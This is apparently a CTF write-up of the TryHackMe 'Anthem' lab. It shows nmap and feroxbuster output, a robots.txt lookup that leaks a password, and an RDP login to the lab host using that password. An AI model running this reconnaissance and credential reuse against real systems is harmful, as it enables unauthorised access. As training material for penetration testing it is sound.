TryHackMe Anthem
nmap
nmap -sV 10.10.13.83
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 18:24 EST
Nmap scan report for 10.10.13.83
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds
feroxbuster
feroxbuster -u http://10.10.13.83 --status-codes 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 邏 ver: 2.10.1
───────────────────────────┬──────────────────────
Target Url │ http://10.10.13.83
Threads │ 50
Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
Status Codes │ [200]
Timeout (secs) │ 7
說 User-Agent │ feroxbuster/2.10.1
Config File │ /etc/feroxbuster/ferox-config.toml
Extract Links │ true
HTTP methods │ [GET]
Recursion Depth │ 4
───────────────────────────┴──────────────────────
Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 126l 323w 5344c http://10.10.13.83/
200 GET 92l 186w 3414c http://10.10.13.83/search
200 GET 103l 185w 3486c http://10.10.13.83/categories
200 GET 104l 188w 3589c http://10.10.13.83/tags
200 GET 30l 162w 1864c http://10.10.13.83/rss
200 GET 10l 19w 379c http://10.10.13.83/rsd/1073
200 GET 6l 16w 325c http://10.10.13.83/opensearch/1073
200 GET 145l 403w 6207c http://10.10.13.83/archive/a-cheers-to-our-it-department
200 GET 148l 378w 6147c http://10.10.13.83/archive/we-are-hiring
200 GET 18l 19w 829c http://10.10.13.83/wlwmanifest/1073
200 GET 126l 323w 5389c http://10.10.13.83/blog
200 GET 95l 189w 4078c http://10.10.13.83/umbraco
200 GET 92l 186w 3464c http://10.10.13.83/Search
200 GET 29l 34w 1035c http://10.10.13.83/sitemap
200 GET 126l 323w 5389c http://10.10.13.83/Blog
200 GET 1l 1w 3276c http://10.10.13.83/umbraco/Application
200 GET 125l 835w 74454c http://10.10.13.83/media/articulate/default/random-mask.jpg
200 GET 111l 205w 4110c http://10.10.13.83/authors
200 GET 30l 162w 1864c http://10.10.13.83/RSS
200 GET 111l 205w 4110c http://10.10.13.83/authors/more enum
curl -s http://10.10.13.83/robots.txt
UmbracoIsTheBest!
# Use for all search robots
User-agent: *
# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/The poem is written by Solomon Grundy
The found email address is JD@anthem.com
So let's assume admin is SD@anthem.com
RDP
xfreerdp /u:SG /p:UmbracoIsTheBest! /w:1366 /h:768 /v:10.10.13.83:3389
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory [/home/kali/.config/freerdp/certs]
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/server]
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - CN = WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.13.83:3389)
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - Common Name (CN):
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.13.83:3389 (RDP-Server):
Common Name: WIN-LU09299160F
Subject: CN = WIN-LU09299160F
Issuer: CN = WIN-LU09299160F
Thumbprint: d9:e0:d8:b4:43:5b:05:61:33:83:fd:44:fa:47:c5:ec:8d:64:52:64:17:28:f8:e4:f8:32:85:eb:87:83:ff:f6
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[18:41:46:646] [50537:50538] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[18:41:46:647] [50537:50538] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfxAnd after that things are easy, admin forgot his password in a backup file.
PreviousPWNEDLABS Identify the AWS Account ID from a Public S3 BucketNextTryHackMe AttacktiveDirectory
Last updated